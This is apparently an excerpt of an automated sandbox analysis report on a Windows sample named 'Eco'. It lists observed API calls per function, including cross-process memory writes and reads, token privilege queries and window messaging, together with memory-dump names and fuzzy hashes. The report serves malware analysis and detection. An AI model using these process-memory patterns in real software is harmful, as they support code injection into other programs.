                          • __beginthreadex.LIBCMT ref: 00574F00
                          • MessageBoxW.USER32(?,?,?,?), ref: 00574F15
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00574F2B
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00574F32
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                          • String ID:
                          • API String ID: 3824534824-0
                          • Opcode ID: 1a803fd04d9524a90b3edeebd0111f4dbd7a62176e21abc6be861cc58f05238d
                          • Instruction ID: ed04378706c333bda179b6fb85f5792ac201295afe7d89d3810d6766d6d82011
                          • Opcode Fuzzy Hash: 1a803fd04d9524a90b3edeebd0111f4dbd7a62176e21abc6be861cc58f05238d
                          • Instruction Fuzzy Hash: 3F11C8B6905244BFC7119FACAC08ADE7FACFB56321F144257F818D33A0D77589089BA0
                          APIs
                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568C1F
                          • GetLastError.KERNEL32(?,005686E3,?,?,?), ref: 00568C29
                          • GetProcessHeap.KERNEL32(00000008,?,?,005686E3,?,?,?), ref: 00568C38
                          • HeapAlloc.KERNEL32(00000000,?,005686E3,?,?,?), ref: 00568C3F
                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568C56
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 842720411-0
                          • Opcode ID: 6764b2f40e01c56886c00b1e46e8204bb904755989e07188c313fccc77230fe0
                          • Instruction ID: 446af70facfd8abd6cd1e90fd1bc7d6ba536ed6e8031a1062c4d5b9abb2c351e
                          • Opcode Fuzzy Hash: 6764b2f40e01c56886c00b1e46e8204bb904755989e07188c313fccc77230fe0
                          • Instruction Fuzzy Hash: EA016D70651204BFEB205FA5EC88DBB7FACFF9A754B100529F848C7260DA318D94DA70
                          APIs
                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?,?,?,00567E56), ref: 00567B28
                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?,?), ref: 00567B43
                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?,?), ref: 00567B51
                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?), ref: 00567B61
                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?,?), ref: 00567B6D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          • Opcode ID: 66ef6ad8c44a90485f83ed4479aeb0aeb02e5d1e6eba9a373ffd4eed8f966b52
                          • Instruction ID: ce84d8478573830bd66a7b7ed2054f050468f7335a0f8bfab690b30afc5c5495
                          • Opcode Fuzzy Hash: 66ef6ad8c44a90485f83ed4479aeb0aeb02e5d1e6eba9a373ffd4eed8f966b52
                          • Instruction Fuzzy Hash: 30017876611209BBDB114F64EC48AAA7FADFF88756F101068F908D3260F735DD40EBA4
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00568AC1
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00568ACB
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00568ADA
                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00568AE1
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00568AF7
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: bec77df6eb64e9c35d5f902bab8eb86ce807059dfb708786192fe44012cb64c0
                          • Instruction ID: ae1ae6f58f05307e2a6a9c8ccb0e928b6ed6a80197f93d43cb96699e57cad1e0
                          • Opcode Fuzzy Hash: bec77df6eb64e9c35d5f902bab8eb86ce807059dfb708786192fe44012cb64c0
                          • Instruction Fuzzy Hash: 48F03C71210204AFEB210FA59C8DEB73BADFF5A758F500115F945871A0CB61DC45EA60
                          APIs
                           • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00568B22
                           • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00568B2C
                           • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00568B3B
                           • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00568B42
                           • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00568B58
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 44706859-0
                          • Opcode ID: c6dedf515ef54303003d01a2a16ac6c0fd926b8916ba2bdf06d3940146456945
                          • Instruction ID: 77acaf66aab1b4291f7ed49611c5ec66639b5a88b9683c2b6f7e4729eccfcba9
                          • Opcode Fuzzy Hash: c6dedf515ef54303003d01a2a16ac6c0fd926b8916ba2bdf06d3940146456945
                          • Instruction Fuzzy Hash: E7F03C71210204AFEB110FA5EC8CFB73BADFF4A754F100129F945861A0DB61D995EA64
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0056CB73
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0056CB8A
                          • MessageBeep.USER32(00000000), ref: 0056CBA2
                          • KillTimer.USER32(?,0000040A), ref: 0056CBBE
                          • EndDialog.USER32(?,00000001), ref: 0056CBD8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 690af26a14745b7512e92f99536689c04b710bffc75be9afb9ad33aa5f1fba55
                          • Instruction ID: f50d1721a911725db1143c36578ffa6f97a4b3995e3c1dd64baf09f5d87d3aa3
                          • Opcode Fuzzy Hash: 690af26a14745b7512e92f99536689c04b710bffc75be9afb9ad33aa5f1fba55
                          • Instruction Fuzzy Hash: C5016D30550708ABEB215F60DD8EFA6BFB8FF11709F440659E582A24E0DBF4A9589F90
                          APIs
                          • EndPath.GDI32(?), ref: 0051179B
                          • StrokeAndFillPath.GDI32(?,?,0054BAF9,00000000,?), ref: 005117B7
                          • SelectObject.GDI32(?,00000000), ref: 005117CA
                          • DeleteObject.GDI32 ref: 005117DD
                          • StrokePath.GDI32(?), ref: 005117F8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: 9c29a7c96099404d32d70f2784d946ea1a8ad96681113bd0643f02467b1335ea
                          • Instruction ID: 891f737a54a17ae76502eae2c98fee736c8ed3aece326f27f5580bcf49150946
                          • Opcode Fuzzy Hash: 9c29a7c96099404d32d70f2784d946ea1a8ad96681113bd0643f02467b1335ea
                          • Instruction Fuzzy Hash: 0FF01430002609ABEB215F66ED4CB993FE4FB22322F048256E929541F0C735899BFF25
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0057C8E2
                          • CoCreateInstance.OLE32(005A3D3C,00000000,00000001,005A3BAC,?), ref: 0057C8FA
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • CoUninitialize.OLE32 ref: 0057CB67
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_memmove
                          • String ID: .lnk
                          • API String ID: 2683427295-24824748
                          • Opcode ID: e5c9aeebe332bd01d8fe65136bf671b3c588a3be2521d3130d6bb151ee6af3a0
                          • Instruction ID: 826da12bcb6e25019656f6596a22a6fe5d313c8c0e2e9dbab2735641969251cf
                          • Opcode Fuzzy Hash: e5c9aeebe332bd01d8fe65136bf671b3c588a3be2521d3130d6bb151ee6af3a0
                          • Instruction Fuzzy Hash: 03A14CB1104206AFE300EF64D885EABBBE8FF95754F40491CF15597292EB70EE49CB92
                          APIs
                            • Part of subcall function 00530F16: std::exception::exception.LIBCMT ref: 00530F4C
                            • Part of subcall function 00530F16: __CxxThrowException@8.LIBCMT ref: 00530F61
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 00521680: _memmove.LIBCMT ref: 005216DB
                          • __swprintf.LIBCMT ref: 0051E598
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0051E431
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 1943609520-557222456
                          • Opcode ID: ad4c8dcfa0c0f4c3ae31a14440f0843edd9e05679e7e42cc6cdb8dc4af5c1259
                          • Instruction ID: 938a6829fa1a4cb1307074dca82999a8646c45243d430f080e05e24207d99a7e
                          • Opcode Fuzzy Hash: ad4c8dcfa0c0f4c3ae31a14440f0843edd9e05679e7e42cc6cdb8dc4af5c1259
                          • Instruction Fuzzy Hash: 6C9160715046129FD714EF24D89ACAF7BA5BFD5700F40491DF842972A1EA30EE84CB96
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 005351FD
                            • Part of subcall function 00540250: __87except.LIBCMT ref: 0054028B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorHandling__87except__start
                          • String ID: pow
                          • API String ID: 2905807303-2276729525
                          • Opcode ID: b1e2e33d814d198f2cb52cad201c7344b89b36cb6e44c83e9529f7af432b3057
                          • Instruction ID: 4dad3e2d2fb052833ab6d73088b1fbc3bc609ea80ff4a4c447af755c73522521
                          • Opcode Fuzzy Hash: b1e2e33d814d198f2cb52cad201c7344b89b36cb6e44c83e9529f7af432b3057
                          • Instruction Fuzzy Hash: FC51547490CA0287DB11BB14C9553BE3F90BB90754F30AD68F5C6862E9FE348CD8EA46
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$+
                          • API String ID: 0-2552117581
                          • Opcode ID: e044d1e05e3dcfcdd386b28ba87fa439239c607dc809764f59287df60a7884e3
                          • Instruction ID: cce4b4130596ccbc7d6b7db2a3ee63cc552ade77d3bf22293a0e59839e021237
                          • Opcode Fuzzy Hash: e044d1e05e3dcfcdd386b28ba87fa439239c607dc809764f59287df60a7884e3
                          • Instruction Fuzzy Hash: 5C512E751042569FDF259F28D4566FA7FA0FFA6320F544066E8829B2E0DB30DD62CB60
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove$_free
                          • String ID: #VR
                          • API String ID: 2620147621-2899241889
                          • Opcode ID: 31762158b29fd8dd724c3db32afe635e6c1cd59cdd4e26b5e097e221d1bacd62
                          • Instruction ID: 658f8d26b1dea12ec63a84b9573365e796074e9c963caeab7c88ec3b180ecbbd
                          • Opcode Fuzzy Hash: 31762158b29fd8dd724c3db32afe635e6c1cd59cdd4e26b5e097e221d1bacd62
                          • Instruction Fuzzy Hash: 43515B71A083418FEB24CF28C495B6BBBE1FFC5314F54492DE989872A0E731E845CB52
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memset$_memmove
                          • String ID: ERCP
                          • API String ID: 2532777613-1384759551
                          • Opcode ID: a13f0fa6255bedbbdcd1498bff738d75557ddcf2ee0f51470873eb1d88b53227
                          • Instruction ID: a1c2aa119a6123bd4fd28e0163c4fc9d4fa32276e11adb886409dceba15e87f2
                          • Opcode Fuzzy Hash: a13f0fa6255bedbbdcd1498bff738d75557ddcf2ee0f51470873eb1d88b53227
                          • Instruction Fuzzy Hash: 3951EE70900719CBDB24CF64D889BAABFF4FF05300F24456EE84ACB291E370AA418B90
                          APIs
                            • Part of subcall function 00571B27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569C31,?,?,00000034,00000800,?,00000034), ref: 00571B51
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0056A1DA
                            • Part of subcall function 00571AF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569C60,?,?,00000800,?,00001073,00000000,?,?), ref: 00571B1C
                            • Part of subcall function 00571A49: GetWindowThreadProcessId.USER32(?,?), ref: 00571A74
                            • Part of subcall function 00571A49: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00569BF5,00000034,?,?,00001004,00000000,00000000), ref: 00571A84
                            • Part of subcall function 00571A49: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00569BF5,00000034,?,?,00001004,00000000,00000000), ref: 00571A9A
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A247
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A294
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          • Opcode ID: ab4fc2e4b20f6a693d6c0957bf43418413b8a40808ccb84470b454d4eaa831d7
                          • Instruction ID: 52d3ece894528d236438e86608f30dd8b53621874b9359d8e8fbe9dd15510449
                          • Opcode Fuzzy Hash: ab4fc2e4b20f6a693d6c0957bf43418413b8a40808ccb84470b454d4eaa831d7
                          • Instruction Fuzzy Hash: B8413E76901119AFDB10DF98DC85EDEBBB8FB49300F004095F949B7181DA71AE89DBA1
                          APIs
                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0059784E
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00597862
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00597886
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: SysMonthCal32
                          • API String ID: 2326795674-1439706946
                          • Opcode ID: e7ae46507abcf81593291ee54d4673a7e386e7af3bbf74191ea802d1afe92fd0
                          • Instruction ID: 1c24a796fb3f8d33f4f4df1debbeb5e635ab54c1b24c16f7682559d22fcf33d3
                          • Opcode Fuzzy Hash: e7ae46507abcf81593291ee54d4673a7e386e7af3bbf74191ea802d1afe92fd0
                          • Instruction Fuzzy Hash: 1221AD3261021DABDF118E94CC46FEA3F69FF8C714F110215FE586B190D6B5A855DBA0
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00597128
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00597138
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0059715D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: 77c41e013029ab55ef6f31342f11e7c01b8eaa1f850bd213afd9e1f0b9ddd482
                          • Instruction ID: ea615444155e1663e9322a3839ba0fc8aa5a6e82c60b451ae476fd3dd2bf0c74
                          • Opcode Fuzzy Hash: 77c41e013029ab55ef6f31342f11e7c01b8eaa1f850bd213afd9e1f0b9ddd482
                          • Instruction Fuzzy Hash: FE218E3262411CBFEF118F54DC45FBB3BAAFB89764F018126FA059B190C671AC51DBA0
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00597B5F
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00597B74
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00597B81
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: 88b4ccff0173c0daee6aa90d18e61d8a19926354b1a94f97bd5038b3f68e44ed
                          • Instruction ID: d670a3787cfa57a60ac57d864e038640ac0712cd9c6e97549ce16fe0e74e4e28
                          • Opcode Fuzzy Hash: 88b4ccff0173c0daee6aa90d18e61d8a19926354b1a94f97bd5038b3f68e44ed
                          • Instruction Fuzzy Hash: 1811C13225420CBEEF209E65CC06FEB3FAAFB89768F110519FA55A6090E671E851DB10
                          APIs
                            • Part of subcall function 0054B474: _memset.LIBCMT ref: 0054B481
                            • Part of subcall function 00530A9F: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0054B450,?,?,?,0051100A), ref: 00530AA4
                          • IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 0054B454
                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 0054B463
                          Strings
                          • =[, xrefs: 0054B444
                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0054B45E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
